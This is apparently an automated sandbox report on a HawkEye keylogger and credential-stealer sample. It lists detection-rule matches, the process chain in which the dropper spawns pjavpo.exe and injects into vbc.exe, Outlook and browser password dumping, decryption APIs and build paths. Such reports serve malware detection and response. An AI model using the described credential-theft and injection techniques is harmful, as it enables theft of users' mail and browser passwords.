                Source: 5.2.pjavpo.exe.284a904.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.500841796.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.500849311.0000000007BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0249685A NtWriteVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0249670A NtQuerySystemInformation,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_024967B2 NtResumeThread,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_0249682D NtWriteVirtualMemory,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_024966C6 NtQuerySystemInformation,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                Source: TGQfHfehsY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeFile created: C:\Users\user\AppData\Roaming\pid.txtJump to behavior
                Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/7@4/3
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,
                Source: TGQfHfehsY.exeVirustotal: Detection: 32%
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeFile read: C:\Users\user\Desktop\TGQfHfehsY.exeJump to behavior
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\TGQfHfehsY.exe "C:\Users\user\Desktop\TGQfHfehsY.exe"
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeProcess created: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeProcess created: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_024941AE AdjustTokenPrivileges,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02494177 AdjustTokenPrivileges,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeFile created: C:\Users\user\AppData\Local\Temp\nsl8C59.tmpJump to behavior
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.csBase64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', '+NuhvnHL/23apr//8A7D9HKLlcgATfODiXKjHLGsasbFDJBFHqbDrty+sGNtrFgc0eVe1DxY3U1N9v9ixGVjuQ==', 'oS55EiDwvndYEtZ5+lXTfbIb8G1taLPDlWmbhqlMK5CSJNdt9Qbgk/vwkhCaHpDIwtEy26QBS+jq3mOtR2AT75ZDkMahwZY7KngJ5TRfdok=', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                Source: Binary string: C:\gfzfo\jdgvpo\ilxz\eb80024cfd9a4588b9c5c2bbb297cb83\uledka\mpuuwnfg\Release\mpuuwnfg.pdb source: TGQfHfehsY.exe, 00000001.00000002.265684302.000000000040B000.00000004.00000001.01000000.00000003.sdmp, pjavpo.exe, 00000003.00000000.229757777.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe, 00000003.00000002.245881929.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe, 00000005.00000000.232538937.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe.1.dr
                Source: Binary string: wntdll.pdbUGP source: pjavpo.exe, 00000003.00000003.242842960.000000001A030000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000003.00000003.236238654.000000001A1C0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.500841796.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: pjavpo.exe, 00000003.00000003.242842960.000000001A030000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000003.00000003.236238654.000000001A1C0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000C.00000000.306975405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.310652543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000C.00000000.305733767.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040F655 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00401F16 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00B27F02 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00411879 push ecx; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_004118A0 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_004118A0 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00442871 push ecx; ret
